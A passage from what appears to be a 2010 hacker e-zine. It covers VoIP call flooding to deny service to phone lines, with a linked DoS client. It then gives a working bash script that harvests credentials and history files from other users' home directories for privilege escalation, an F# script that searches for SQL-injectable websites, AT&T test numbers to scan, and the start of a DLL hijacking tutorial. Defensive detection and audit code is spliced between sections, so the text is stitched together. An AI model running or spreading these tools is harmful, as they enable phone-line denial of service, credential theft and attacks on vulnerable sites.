* Can place a ton of calls quickly. With hard lines you are limited to very few channels. With
most VoIP lines, you are only limited by your bandwidth.
Of the 3 reasons above, reason 3 is particularly important. VoIP calls use either the IAX or SIP
protocol to initiate calls. When VoIP calls are made, SIP packets are sent back and forth from
your server to your VoIP provider, who then relays the call to the target. What is special about
this is that it uses almost no bandwidth. The only thing being transmitted are IAX or SIP packets
(which are small). The actual bulk of bandwidth usage typically associated with VoIP calls comes
into play once a call has been answered. Once a call is answered, an RTP stream is opened which then
sends large voice packets across your connection, thereby increasing your bandwidth usage
immensely.
Why does this matter?
It matters because it gives you a killer advantage that your target does not have. It gives you an
easier way to scale your attack. Let's say a target phone number has 5 lines. Let's also assume that
you are running this DoS from a home computer with an extremely limited internet connection that
restricts you to 10KB/s up. That typically wouldn't be enough for a single VoIP call, so you would
never be able to make 5 calls and flood your target. WRONG. Since you call the target and
immediately hang up, there are no RTP packets! This means that you can place as many simultaneous
calls as you can send SIP invites (a LOT).
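The same property that makes a signalling-only flood cheap to send makes it easy to recognise on the receiving side: a burst of unanswered, zero-duration calls to one number, each arriving with a different caller ID. The following is an added example, not part of the original article, of a small detector over constructed Asterisk-style CDR rows (Asterisk's CDR really does carry a billsec field; the sample rows, the sixty-second window and the thresholds are assumptions for the demonstration).

```python
import collections
from datetime import datetime, timedelta

# Constructed CDR-style records (timestamp, caller ID, destination, billsec).
# billsec is the answered-seconds field Asterisk writes to its CDR; 0 means the
# call was never answered, so no RTP ever flowed. The first seven rows mirror
# the flood shown above: one destination, a fresh caller ID on every call.
SAMPLE_CDR = [
    ("2010-10-01 04:57:00", "7110992417", "18182223333", 0),
    ("2010-10-01 04:57:08", "3689407130", "18182223333", 0),
    ("2010-10-01 04:57:17", "4139439982", "18182223333", 0),
    ("2010-10-01 04:57:25", "9795095964", "18182223333", 0),
    ("2010-10-01 04:57:34", "5278670787", "18182223333", 0),
    ("2010-10-01 04:57:42", "6684773360", "18182223333", 0),
    ("2010-10-01 04:57:51", "2716775282", "18182223333", 0),
    # Ordinary traffic: one answered call and two missed calls to a second number
    ("2010-10-01 05:00:00", "2125550100", "12125551212", 120),
    ("2010-10-01 05:00:30", "2125550101", "12125551212", 0),
    ("2010-10-01 05:01:10", "2125550102", "12125551212", 0),
    # One impatient caller redialling a busy line: many short calls, one caller ID
    ("2010-10-01 06:00:00", "5551234567", "18005551000", 0),
    ("2010-10-01 06:00:10", "5551234567", "18005551000", 0),
    ("2010-10-01 06:00:20", "5551234567", "18005551000", 0),
    ("2010-10-01 06:00:30", "5551234567", "18005551000", 0),
    ("2010-10-01 06:00:40", "5551234567", "18005551000", 0),
    ("2010-10-01 06:00:50", "5551234567", "18005551000", 0),
]


def parse_cdr(records):
    """Turn the raw tuples into (datetime, caller_id, destination, billsec)."""
    return [(datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), cid, dst, int(billsec))
            for ts, cid, dst, billsec in records]


def find_unanswered_floods(records, window=timedelta(minutes=1),
                           min_calls=5, min_callers=3):
    """Return {destination: (calls, distinct_caller_ids)} for every destination
    that received at least `min_calls` unanswered calls from at least
    `min_callers` distinct caller IDs inside some sliding `window`.
    The reported pair is the largest such burst seen for that destination."""
    by_dst = collections.defaultdict(list)
    for start, cid, dst, billsec in sorted(records):
        if billsec == 0:                      # unanswered: signalling only, no RTP
            by_dst[dst].append((start, cid))

    alerts = {}
    for dst, calls in by_dst.items():
        lo = 0
        for hi in range(len(calls)):
            # slide the window's left edge so calls[lo:hi+1] spans at most `window`
            while calls[hi][0] - calls[lo][0] > window:
                lo += 1
            burst = calls[lo:hi + 1]
            callers = {cid for _, cid in burst}
            if len(burst) >= min_calls and len(callers) >= min_callers:
                if dst not in alerts or len(burst) > alerts[dst][0]:
                    alerts[dst] = (len(burst), len(callers))
    return alerts


if __name__ == "__main__":
    for dst, (n, k) in find_unanswered_floods(parse_cdr(SAMPLE_CDR)).items():
        print("%s: %d unanswered calls from %d caller IDs within 60s" % (dst, n, k))
```

The distinct-caller threshold is what separates the rotating-caller-ID flood from a single redialling caller; lowering min_callers to 1 makes the detector report the redialler too, which is a policy choice rather than a bug. In practice the same rule can be applied as a per-destination rate limit in the dialplan rather than after the fact.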
Conclusion
----------
With the information and source code provided, you should be able to easily DoS yourself or stress
test other phone numbers in no time.
I've started development on what will soon be a fully completed Asterisk DoS client with lots of
juicy command line options, statistics, and other cool items. If you're interested in following my
progress, feel free to check out the project page for it at
http://github.com/comradeb14ck/asteriskdos.
And that's about it!
[==================================================================================================]
-=[ 0x04 duper's Code Corner
-=[ Author: duper
-=[ Website: http://projects.ext.haxnet.org/~super/
#!/bin/bash
#
# _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
# / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \
#( d | u | p | e | r | ' | s ) ( c | o | d | e ) ( c | o | r | n | e | r )
# \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/
#
#
# scan-home-dirs.bash by duper for GNY
# Fri Oct 1 04:57:00 UTC 2010
#
# A bash script that scans home directories and other filesystem directory
# hierarchies for sensitive data conducive to attacks against local privilege
# escalation..
#
# NOTE: this script requires GNU parallel as a prerequisite. You may need to
# install the tarball from http://gnu.org/software/parallel first..
#
# Feel free to add your own common directories, subdirectories, "hidden"
# dot-files and such to scan. The regular expression for matching sensitive data
# can be easily configured as well.
#
# This is the command I use for finding new filenames to add to the script:
#
# nice -2 find / \( -type f -or -type d \) -and \( -perm /0001 -or \
# -perm /0002 \) -and \( -not -iname "/proc/*" -and -name ".*" -or \
# -iname "*.cf" -or -iname "*.conf" \) -and -not -empty \
# -fls /tmp/find.$$ 2>/dev/null
#
# ..obviously the output goes to /tmp. This script essentially allows you to
# discover data in hidden files within directories that you may not necessarily
# have read access to -- If you've ever seen dirbx.c, a brute force executable
# directory lister by dmuz and methodic, then you probably understand this
# concept already. However, the problem with dirbx is that it takes too long
# to generate all the filename combinations. Therefore, scan-home-dirs (this
# script) just uses well-known file and directory names to expedite the process.
#
# If you're not familiar with dirbx, I'm including an excerpt of the mailing
# list message from whence it first appeared:
#
# "AngryPacket Security is proud to announce the release of dirbx! dirbx is
# a brute force executable directory and file enumerator. It could prove
# to be very useful in local pen-tests where you don't have UID 0 and some
# directories have "--x" permissions. "
#
# So in other words, you're going to get `Permission denied' if you try to run
# /bin/ls on a directory with only the world execute bit set. Regardless, you
# can still view world readable files inside that directory if you provide
# /bin/cat with a full pathname. For example:
#
# [super@callisto ~]$ ls -ld /home/whye
# drwx-----x 13 whye whye 4096 Sep 21 04:35 /home/whye
# [super@callisto ~]$ ls /home/whye
# ls: /home/whye: Permission denied
# [super@callisto ~]$ ls -ld /home/whye/.bashrc
# -rw-r--r-- 1 whye whye 225 Mar 21 2010 /home/whye/.bashrc
# [super@callisto ~]$ head -4 /home/whye/.bashrc
# .bashrc
#
# Source global definitions
# if [ -f /etc/bashrc ]; then
# [super@callisto ~]$
#
# Display program banner
# Display program banner
echo
echo 'scan-home-dirs.bash by duper for GNY'
echo '===================================='
echo
# First, we'll look through directories that we ARE able to read. The glob also
# matches each home's "." and ".." entries, which the egrep -v filters out.
alist=$(ls -altd /home/*/.* 2>/dev/null | awk '/^d/ {print($9)}' | \
    egrep -v '([.]+)$')
# Loop through the list and display on standard output
for f in $alist
do
    printf "%s\n" "$f"
done
# These are the filename/pathname/globbing/patterns/etc. to look for in the
# directories that we only have execute access on, i.e. no read access.
# Entries containing "*" are quoted so they expand under /home/*/ later on,
# not in the current directory while the array is being built.
declare -a filez=(core .bash_history .profile .ptksh_history .sh_history \
    .history dead.letter mbox .Xauthority .forward .bitchxrc .pine-debug1 \
    .addressbook .bash_login .bash_logout .screenrc .addressbook.lu .cshrc \
    .bashrc .tcshrc .zshrc .nessusrc .nessusrc.cert .obv.friends .obv.shitlist \
    .festival_history .mysql_history .muttrc .ircrc .realplayerrc .rhosts \
    .htpasswd .passwd .procmailrc .zsh_history .zshhistory '.BitchX/*' '.irssi/*' \
    '.lftp/*' '.ssh2/*' '.ssh/*' '.pgp/*' '.gnupg/*' '.mozilla/*' '.ncftp/*' \
    '.subversion/*' 'public_html/*' 'bin/*' 'tmp/*' 'temp/*' '*' '*/*' '*/*/*' \
    '*/*/*/*')
# Next, we parallelize the reads for the directories we DON'T have read access
# for. Again, the extended regular expression and home directory pathname glob
# can be modified to your liking. By default, home directories are checked for
# strings which look like sensitive and/or hex-encoded/encrypted data.
# The pattern has to stay on one line: inside single quotes a backslash-newline
# reaches egrep literally and aborts it with "Trailing backslash".
regex='^[a-z]{4,}:[a-z0-9/.]{6,}| -p |pass |auth|secret|private|backdoor|trojan|rootkit|assword|admin|[0-9A-F]{32,40}'
# "${filez[@]}" hands parallel every pattern; a bare ${filez} would only pass
# the first one. mapfile keeps each matching output line whole.
mapfile -t ret < <(parallel -j6 "egrep -in '$regex' /home/*/{} 2>/dev/null" ::: "${filez[@]}")
# Loop through and format output for fully qualified pathnames that are returned
for apath in "${ret[@]}"
do
    printf "%s\n" "$apath"
done
# Tell the shell how many matching lines we found while we're exiting
# (exit statuses wrap at 256, so treat this as an indicator, not an exact count)
exit ${#ret[@]}
#EOF
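The premise of the script above (a home directory with only the world-execute bit set still leaks any world-readable file whose name can be guessed) is also the checklist for the owner of that home directory. As an added example, not part of the Code Corner, here is the defender's counterpart: an audit that walks a home directory, reports the home itself when others can traverse or list it, reports well-known sensitive dot-files and directories (names taken from the script's own list) that others can read, and then strips the "other" bits. The fixture directory it builds under a temporary path, the file contents and the exact modes are constructed for the demonstration.

```python
import os
import stat
import tempfile

# Names from the script's own list of interesting dot-files, plus directories
# whose whole contents are sensitive (keys, keyrings, cached credentials).
SENSITIVE_FILES = {".bash_history", ".sh_history", ".zsh_history", ".mysql_history",
                   ".rhosts", ".htpasswd", ".passwd", ".Xauthority", ".forward"}
SENSITIVE_DIRS = {".ssh", ".ssh2", ".gnupg", ".pgp", ".subversion"}


def audit_home(home):
    """Return sorted (path relative to the home's parent, problem) pairs.
    The home is reported when others may traverse (x) or list (r) it, sensitive
    files when others may read them, sensitive directories when others may enter
    or list them, and anything at all that others may write."""
    parent = os.path.dirname(home.rstrip(os.sep))
    findings = []

    def rel(path):
        return os.path.relpath(path, parent)

    home_mode = stat.S_IMODE(os.lstat(home).st_mode)
    if home_mode & (stat.S_IROTH | stat.S_IXOTH):
        findings.append((rel(home), "home traversable/listable by others (mode %o)" % home_mode))

    for root, dirs, files in os.walk(home):
        for name in dirs + files:
            path = os.path.join(root, name)
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):       # judge targets, not links
                continue
            mode = stat.S_IMODE(st.st_mode)
            top = os.path.relpath(path, home).split(os.sep)[0]
            sensitive = name in SENSITIVE_FILES or top in SENSITIVE_DIRS
            if mode & stat.S_IWOTH:
                findings.append((rel(path), "writable by others (mode %o)" % mode))
            elif sensitive and stat.S_ISDIR(st.st_mode) and mode & (stat.S_IROTH | stat.S_IXOTH):
                findings.append((rel(path), "sensitive directory open to others (mode %o)" % mode))
            elif sensitive and mode & stat.S_IROTH:
                findings.append((rel(path), "sensitive file readable by others (mode %o)" % mode))
    return sorted(findings)


def harden_home(home):
    """Clear every 'other' permission bit on each finding; return what remains."""
    parent = os.path.dirname(home.rstrip(os.sep))
    for relpath, _ in audit_home(home):
        path = os.path.join(parent, relpath)
        os.chmod(path, stat.S_IMODE(os.lstat(path).st_mode) & ~0o007)
    return audit_home(home)


def build_demo_home():
    """Constructed fixture reproducing the drwx-----x case from the script's
    comments: the home cannot be listed, yet a dot-file inside is world-readable."""
    base = tempfile.mkdtemp(prefix="gny-")
    home = os.path.join(base, "whye")
    os.mkdir(home)

    def put(relpath, mode, is_dir=False):
        path = os.path.join(home, relpath)
        if is_dir:
            os.mkdir(path)
        else:
            with open(path, "w") as fh:
                fh.write("constructed sample content\n")
        os.chmod(path, mode)

    put(".ssh", 0o700, is_dir=True)
    put(os.path.join(".ssh", "id_rsa"), 0o600)    # correctly locked down
    put(".bashrc", 0o644)                           # harmless, as in the ls example above
    put(".bash_history", 0o644)                     # the leak: readable by anyone
    put(".gnupg", 0o755, is_dir=True)               # keyring directory open to all
    put(os.path.join(".gnupg", "pubring.gpg"), 0o644)
    os.chmod(home, 0o711)                           # drwx-----x, exactly as on the page
    return home


if __name__ == "__main__":
    demo = build_demo_home()
    for relpath, problem in audit_home(demo):
        print("%-28s %s" % (relpath, problem))
    print("after hardening: %d findings" % len(harden_home(demo)))
```

Run against a real /home the audit wants to be executed as each user (or as root), since the walk itself needs read access the attacker lacks; the point is that it finds the same files the brute-force approach would, but from the side that can fix them. A stricter umask (077) for interactive users prevents most of these findings from appearing in the first place.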
----------------------------------------------------------------------------------------------------
(*
GNY-SID is a SQL Injection Dorker script written in F# (pronounced "F-Sharp")
which is a new functional language developed by Don Syme of Microsoft
Research for the .NET framework. It is now included with Visual Studio; I
happen to be using the 2010 Ultimate version. However, you can download an F#
interpreter separately from http://msdn.microsoft.com/fsharp -- and even
though I said "interpreter", F# is also a language that can be compiled to
.NET's CIL (Common Intermediate Language.) In this case, the code included
below is intended to be interpreted. As such, I have named the script
GNY-SID.fsx as "fsx" is the filename extension used for F# scripts. You can
simply cut and paste the code into fsi.exe, or if you're using Visual Studio,
use the keystroke combinations CTRL-A (Select All) and ALT-ENTER to send the
code to the F# Interactive Window.
FSI is just a REPL (Read-Eval-Print-Loop) as you've probably seen included
with other interpreted languages like Perl, Scheme, and Python. Although the
FSI window doesn't currently feature syntax highlighting or IntelliSense
drop-downs like Visual Studio, you can still use the TAB key to page through
static functions provided by a particular module. For example, typing "List."
and then continually hitting TAB will provide core F# functions available to
the list data type. I personally have FSI listed in my Start Menu and edited
the Shortcut Key in Properties to be CTRL+ALT+F so I can quickly access the
F# REPL at any time.
Okay, now onto how GNY-SID.fsx itself works:
*)
(*%*%*%* GNY-SID.fsx by duper for GNY *%*%*%*)
// Open the standard .NET namespaces we'll be accessing
open System
open System.Net
open System.Web
open System.Text
open System.Text.RegularExpressions
// This namespace is exclusive to F# .. you can tell by the name ;)
open Microsoft.FSharp.Control.WebExtensions

// The first part of the search engine's CGI URL for finding web pages
let theUrl = [ "http://search.yahoo.com/search?p=" ]
// This will eventually be URL-encoded and appended to the URL above..
// It's the actual "dork" search string..
let ad0rq = [ "warning ociexecute \"on line\"" ]

// Extract matched subexpression strings (i.e., vulnerable web site URI's).
// The cons after the recursive call means this is not tail-recursive, which
// is fine for the handful of results a single search page returns.
let rec printRegexMatches (m : Match) =
    let matchString = m.Groups.[1].Value
    if matchString.Length > 0 then
        match m.Success with
        | true -> matchString :: printRegexMatches (m.NextMatch())
        | _ -> []
    else
        []

(* This function pairs the matcher above with the regular expression that
   matches the vulnerable web pages returned by the search engine. Obviously,
   if the search engine changes the formatting of its output HTML, then this
   regexp needs to be changed as well. Ideally, we would have access to a SOAP
   web service or RSS/ATOM feed where the XML formatting is guaranteed. *)
let printPageMatches (htm : string) =
    let re = new Regex("<h3><a class=\"yschttl spt\" href=\"(http[^\"]+)\" data")
    printRegexMatches (re.Match(htm))

// This function returns an asynchronous workflow allowing more than one search
// request to be conducted at a time, e.g. a simple parallelism of web requests.
let fetchAsync (url : string) =
    async {
        let webClient = new WebClient()
        let searchUrl = (new StringBuilder()).Append(url).Append(HttpUtility.UrlEncode(ad0rq.Head))
        let! html = webClient.AsyncDownloadString(new Uri(searchUrl.ToString()))
        // Display output: one matched URL per line
        printPageMatches html |> List.iter Console.WriteLine
    }

// Put everything together..
let runAll () =
    theUrl
    |> Seq.map fetchAsync
    |> Async.Parallel
    |> Async.RunSynchronously

// ..and run it!
runAll();;
[==================================================================================================]
-=[ 0x05 Test Numbers
-=[ Author: storm
-=[ Email: storm@gonullyourself.org
-=[ Website: http://gonullyourself.org/
After doing some extensive Google dorking of the AT&T website, I came across quite a number of
documents containing lists of test numbers. The following numbers are from documents pertaining to
the Dallas, Houston, and Beaumont regions of Texas. All numbers listed have been confirmed as
active at the time of this issue's release. As milliwatts and certain other test numbers are of
little direct use to anyone who is not a field technician, one may instead take the opportunity to
scan their respective ranges in hope of discovering sensitive and interesting numbers.
Descriptions of test numbers are courteously provided by AT&T:
"102-type milliwatt provides connection to a 1004 HZ power source (milliwatt) required for one-way
transmission testing. Typical features are:
- off-hook supervision
- 175 millisecond delay
- 1004 HZ at a reference level
- 1 second interval of on-hook supervision, without tone, every 10 seconds until released
- idle circuit termination during on-hook
Fixed PADs (TP2, TP9) and PAD switching signals are included in the test line, when required, to
furnish proper reference level at switch."
102-type (Milliwatt)
------------
214-220-0029
214-421-6276
214-489-4250
214-553-0587
214-599-9723
214-746-6309
214-821-2759
281-342-9699
281-346-1399
281-351-1499
281-353-1899
281-356-1499
281-367-1899
281-373-0904
281-376-1499
281-437-1899
281-444-1899
281-445-0125
281-449-1899
281-452-1899
281-456-0080
281-463-1899
281-464-9999
281-471-1499
281-482-1499
281-487-1899
281-489-7499
281-492-1899
281-497-4004
281-498-1499
281-592-1499
281-876-1405
409-245-0917
409-245-0930
409-245-1272
409-384-1200
409-385-1109
409-547-2278
409-746-2401
409-755-0809
409-763-3100
409-836-0538
409-836-1222
409-836-5416
409-866-9111
409-882-8301
409-899-9921
409-938-3241
409-945-8894
713-222-1099
713-433-3499
713-462-1499
713-522-3499
713-532-9999
713-571-9999
713-626-1499
713-638-4097
713-638-4098
713-651-9299
713-661-0088
713-723-2499
713-741-1499
713-771-6099
713-861-1793
713-871-0199
713-928-9020
713-946-1499
713-991-1499
832-242-9999
903-367-7528
903-378-7047
903-496-2607
903-560-1710
903-786-6237
903-873-2785
972-218-0916
972-224-5053
972-225-1399
972-226-3181
972-230-7828
972-241-7355
972-248-5052
972-270-9032
972-286-6419
972-287-1086
972-293-3731
972-308-0013
972-329-1900
972-335-7989
972-347-3264
972-370-0055
972-382-3257
972-472-6426
972-474-8703
972-479-0064
972-483-6122
972-515-3011
972-524-8151
972-542-2213
972-552-1009
972-635-0034
972-709-0277
972-722-8083
972-723-0019
972-782-8696
972-831-8042
972-875-3160
972-923-0047
972-980-4071
979-732-5646
979-885-3780
"105-type (local and toll) provides access to a far-end automatic transmission measuring system
(ATMS) responder. Two-way transmission, noise and gain-slope measurements may be made between the
far-end responder under control of automatically or manually directed test equipment."
105-type
------------
281-209-9999
281-342-9599
281-343-1998
281-346-1866
281-351-7121
281-353-2199
281-356-1330
281-367-2199
281-373-0907
281-376-1552
281-437-7429
281-442-2199
281-443-6932
281-444-0970
281-445-1009
281-458-1811
281-463-1199
281-469-2112
281-471-0851
281-474-3233
281-482-2199
281-486-1428
281-489-0044
281-492-1199
281-495-1999
281-497-4005
281-592-4199
281-876-1406
409-384-4639
409-724-3106
409-735-5392
409-762-7098
409-866-9296
409-899-9923
409-938-3238
409-945-8890
409-959-1050
409-971-2406
409-983-3102
409-983-3105
713-223-8847
713-451-2199
713-462-6399
713-472-0037
713-491-9987
713-522-3199
713-571-9997
713-626-1734
713-641-4899
713-651-9799
713-672-9202
713-681-1299
713-682-1499
713-729-2799
713-733-3910
713-741-8566
713-757-9912
713-790-1062
713-861-7399
713-871-1199
713-928-9021
713-946-8506
713-972-1080
713-981-1799
713-991-3728
832-251-0007
972-292-2125
972-734-3006
"108-type non-inverting loopback test line provides for digital testing capabilities between digital
exchanges and/or digital PBXs. The digital loopback test line provides a dialable, 4-wire test line
capability; it consists of circuitry that accepts and loops back received octets which are
retransmitted so that the positions of the bits within the octets are preserved."
108-type (Echo)
------------
281-227-9998
281-280-0034
281-320-0689
281-343-0785
281-346-2144
281-351-5445
281-356-1810
281-362-0684
281-373-0098
281-399-1580
281-440-1161
281-445-1195
281-471-0060
281-489-3122
281-497-4544
281-593-1299
281-876-1938
409-384-4311
409-763-8270
409-883-3099
409-895-0036
409-933-1301
409-945-8731
409-985-2911
713-472-0122
713-491-9995
713-522-2148
713-571-9998
713-621-2390
713-626-0666
713-638-4059
713-651-1443
713-681-9929
713-690-9987
713-721-1297
713-747-0047
713-757-9913
713-794-0484
713-861-0281
713-910-4522
832-251-0008
Silent lines go off-hook and remain silent until the calling party ends the call. They are
generally used to gauge the amount of line noise present. While there were no silent lines listed,
a few of the numbers must have been converted since.
Silent
------------
281-331-2297
281-437-2498
281-463-1012
281-484-6006
409-980-0450
713-433-3599
713-461-0501
972-747-9999
The following numbers were marked as test numbers but have either died or been assigned to other
purposes:
Incorrect
------------
214-375-9999 - VMB (469-855-9941)
214-398-5209 - HELO
214-429-9999 - VMB
214-465-9999 - "The feature you are attempting to use is either not recognized on this system is or
not currently available for you to use" - 1-800-331-0500 (Message 8; CT01UN)
214-623-9999 - "It is not necessary to dial a 1 or 0 when calling this number"
214-654-9308 - DISCO
214-845-9999 - "Either the number you dialed is not a working number or must be dialed with the
correct area code plus seven digits"
214-951-9999 - DISCO or NIS
214-987-3711 - DISCO
281-331-2009 - CBCAD (119T)
281-341-9499 - DISCO or NIS
281-458-8499 - reorder
281-479-1899 - DISCO or NIS
281-479-2199 - reorder
281-485-4304 - answering machine
281-485-6686 - fax
281-487-2299 - DISCO or NIS
281-488-1499 - DISCO or NIS
281-492-0652 - answering machine
281-498-0733 - DISCO or NIS
281-585-6649 - "not a working number" (Message 3; CT01UN)
281-689-2714 - DISCO or NIS
281-689-3123 - DISCO or NIS
281-825-1000 - VMB
281-938-3241 - CBCAD (119T)
409-233-1330 - reorder
409-234-2063 - ACB (119T)
409-234-7903 - reorder
409-234-7912 - CBCAD (?? 3)
409-239-3188 - Verizon Wireless "changed, DISCO, or NIS" (Announcement 2; switch 12-4)
409-239-3193 - Verizon Wireless "changed, DISCO, or NIS" (Announcement 2; switch 12-4)
409-265-0316 - reorder
409-265-0325 - reorder
409-265-5512 - CBCAD (119T)
409-279-5153 - reorder
409-279-6999 - reorder
409-279-9520 - reorder
409-291-0054 - HELO
409-291-8327 - apartment complex
409-336-8332 - CBCAD (119T)
409-336-8372 - reorder
409-398-2071 - reorder
409-398-2510 - reorder
409-398-5089 - CBCAD (119T)
409-532-0041 - NIS
409-532-1660 - NIS
409-532-2386 - NIS
409-543-1582 - "temporarily NIS" (Message 3; Switch 60)
409-543-8109 - HELO
409-543-8134 - "The number or code you have dialed is incorrect. Please check the number or code and
try again." (Message 7; Switch 60)
409-560-3978 - CBCAD (119T)
409-560-3994 - reorder
409-564-0258 - CBCAD (119T)
409-598-2242 - reorder
409-598-2405 - reorder
409-598-2547 - reorder
409-724-3102 - DISCO or NIS
409-729-9908 - ring out to "Your party is not answering. Please try your call later. We're sorry,
but your call will now be disconnected." (038T)
409-735-2199 - DISCO or NIS
409-736-0179 - busy
409-736-1828 - "we're sorry, your call cannot be completed to the access code you selected. Please
check the code and dial again or call your long-distance company for assistance."
409-737-2668 - "not a working number" (Message 3; CT01UN)
409-738-2025 - doesn't even ring
409-740-3566 - CBCAD (092T)
409-740-8925 - reorder
409-740-8933 - CBCAD (003T)
409-752-3881 - DISCO or NIS
409-752-5680 - DISCO or NIS
409-769-1109 - DISCO or NIS
409-826-3150 - CBCAD (119T)
409-826-4869 - reorder
409-826-6600 - reorder
409-848-0692 - reorder
409-848-2309 - CBCAD (119T)
409-848-2317 - CBCAD (119T)
409-857-3400 - reorder
409-866-0691 - ring out to "Your party is not answering. Please try your call later. We're sorry,
but your call will now be disconnected." (038T)
409-882-8303 - doesn't even ring
409-922-8179 - reorder
409-963-2359 - "we're sorry, your call cannot be completed to the access code you selected. Please
check the code and dial again or call your long-distance company for assistance."
409-999-9999 - CBCAD (119T)
713-221-1678 - ring out, no bridge
713-271-1299 - DISCO or NIS
713-453-8599 - DISCO or NIS
713-467-0599 - DISCO or NIS
713-468-2099 - DISCO or NIS
713-469-1499 - Verizon Wireless "not available at this time" (Announcement 1; switch 12-3)
713-472-5199 - busy
713-474-2199 - DISCO or NIS
713-641-4799 - CBCAD (119T)
713-661-3099 - DISCO or NIS
713-663-1599 - DISCO or NIS
713-671-0140 - does not accept blocked Caller ID
713-672-1499 - "not a working number" (Message 3; CT01UN)
713-692-2199 - HELO
713-692-7099 - CBCAD (013T)
713-734-4399 - reorder
713-790-1799 - ring out, no bridge
713-884-1000 - "not a working number" (Message 3; CT01UN)
713-972-1194 - DISCO
903-327-9999 - CBCAD (119T)
903-441-9999 - HELO
903-467-9999 - VMB (not set up yet)
903-626-4085 - DISCO
936-349-9999 - DISCO or NIS (Brookvale? 2)
972-266-9999 - "Either the number you dialed is not a working number or must be dialed with the
correct area code plus seven digits"
972-352-9999 - NIS (Message TX09080656)
972-570-9999 - DISCO or NIS
972-837-2119 - "Either the number you dialed is not a working number or must be dialed with the
correct area code plus seven digits"
972-924-2095 - "Either the number you dialed is not a working number or must be dialed with the
correct area code plus seven digits"
[==================================================================================================]
-=[ 0x06 Practical DLL Hijacking
-=[ Author: storm
-=[ Email: storm@gonullyourself.org
-=[ Website: http://gonullyourself.org/
Table of Contents
I. Introduction
II. Threat or No Threat?
III. Background on DLL Hijacking
IV. Developing a Proof of Concept
V. Real-World Attack Examples
VI. Omg Hax
I. Introduction
===============
A recent craze has been forming over a new attack vector known as "DLL hijacking." This paper is
meant to inform the reader about what exactly this attack vector is, how it works, and how to
develop a proof of concept exploit for it. I will also be covering some more advanced topics, such
as how DLL hijacking may be used in a practical manner to deliver malicious payloads, and I will
also introduce a new utilization of this attack to silently execute code on a remote system.
II. Threat or No Threat?
========================
There has been a lot of discussion about whether or not DLL hijacking actually presents any sort of
security risk, and at first look, one may agree that these concerns hold some merit. In a typical
scenario, an attacker would already need to possess a significant level of access to the target
machine and its filesystem in order to perform a hijack, so the question remains that if such a
level of access has already been achieved, then why would time and resources be wasted on a DLL
hijack? Instead, an attacker would probably have the power to simply tamper with the targeted
program itself or execute a downloaded binary with the same user permissions.
If an average DLL hijacking scenario doesn't grant escalated privileges to an attacker, then what
the heck use is it? DLL hijacking is appropriate in situations where an attacker does not have
actual interactive access to a target system but is still able to pass files to it, such as when a
user downloads content through BitTorrent or plugs in a USB thumb drive. In both of these
situations, DLL files may be planted on a system in specific relation to other key files in the
absence of the attacker maintaining any interactive access to the machine at all. When executed
properly, this attack is very effective and very dangerous. DLL hijacking won't bring about the
destruction of all computing as the media generally makes any vulnerability out to be (I'm assuming
it won't), but it certainly has its place as a valid security concern that must be addressed.
In any regard, the vendors seem to be taking it seriously:
From: "Adobe PSIRT" <psirt@adobe.com>
Subject: Adobe Report
Date: Mon, August 30, 2010 11:26 am
To: "storm@gonullyourself.org" <storm@gonullyourself.org>
Cc: "Adobe PSIRT" <psirt@adobe.com>
Hello sToRm,
We noticed you posted a report on the Exploit database about an issue affecting an
Adobe product: Adobe Photoshop CS2 DLL Hijacking Exploit (Wintab32.dll),
http://www.exploit-db.com/exploits/14741. We are currently investigating how to
resolve the issue. We definitely appreciate your feedback about the security of our
products, and encourage you to contact us directly in the event you find any further
issues, or have additional information you would like to share about the issue
already reported. Please contact us at PSIRT@adobe.com.
Thank you very much,
Wendy
Adobe Product Security Incident Response Team
III. Background on DLL Hijacking
================================
First, let's answer the question of what a DLL file is. Basically, DLL files (the acronym stands
for "dynamic-link library") are Windows's version of shared libraries, which are packages of
different subroutines that grant greater functionality to programs. Directly quoting a Microsoft
article, "For example, in Windows operating systems, the Comdlg32 DLL performs common dialog box
related functions." Numerous DLL files exist, each providing unique functionality. To cite another
example, when loaded by a program, the wsock32.dll file offers an interface to the Windows Sockets
API.
Above, I mentioned that DLL files are shared libraries, not static libraries. This is a key piece
of information in the context of our attack. To further explain, shared libraries are loaded at
run-time, unlike static libraries, which are linked in at compile-time. The functionality provided
by static libraries is compiled directly into the binary itself, whereas the functionality provided
by shared libraries is compiled separately and loaded into memory once the program requests it. By
using shared libraries, the overall program size decreases since the executable only stores a table
of required functions instead of the functions themselves. This process is referred to as dynamic
linking.
Dynamic linking offers many advantages over static linking (whose definition you have probably
worked out already), just as static linking offers some advantages over dynamic linking. For
instance, as previously stated, dynamic linking decreases the overall size of the final executable.
Shared libraries may also be easily updated without the need for recompiling the affected program.
Additionally, dynamic linking promotes the reusage of code and allows such libraries to be called
upon by multiple programs at the same time. Quoting the book "An Introduction to GCC: for the GNU
compilers gcc and g++," "Most operating systems also provide a virtual memory mechanism which allows
one copy of a shared library in physical memory to be used by all running programs, saving memory as
well as disk space." Dynamic linking provides both efficient usage of resources and flexibility in
programming.
This flexibility, however, is what causes programs to be vulnerable to DLL hijacking. When
specifying a DLL file to be loaded by a program, a programmer has various options. First, s/he may
call the library using an absolute path, such as "C:\Windows\system32\wsock32.dll". Second, s/he
may call the library using a relative path, such as "..\..\Windows\system32\wsock32.dll". Third,
s/he may call the library simply by defining "wsock32.dll" with no path. This third option is of
particular interest to us due to the way Windows attempts to locate DLL files with no definite
path.
The following lists are from various Microsoft KB articles and the ACROS Security Blog. Asterisks
denote families of functions.
When the LoadLibrary* functions are invoked, the following locations are searched for the requested
file:
1. The directory from which the application loaded
2. The system directory
3. The 16-bit system directory
4. The Windows directory
5. The current working directory (CWD)
6. The directories that are listed in the PATH environment variable
When the SearchPath, CreateProcess*, and LoadModule functions are invoked, the following locations
are searched for the requested file:
1. The directory from which the application loaded
2. The current working directory (CWD)
3. The system directory
4. The 16-bit system directory
5. The Windows directory
6. The directories that are listed in the PATH environment variable
When the ShellExecute* functions are invoked, the following locations are searched for the requested
file:
1. The current working directory (CWD)
2. The 32-bit System directory (Windows\System32)
3. The 16-bit System directory (Windows\System)
4. The Windows directory (Windows)
5. The directories in the PATH environment variable
6. The directories specified in the App Paths registry key
When the WinExec function is invoked, the following locations are searched for the requested file:
1. The directory from which the application loaded.
2. The current working directory (CWD)
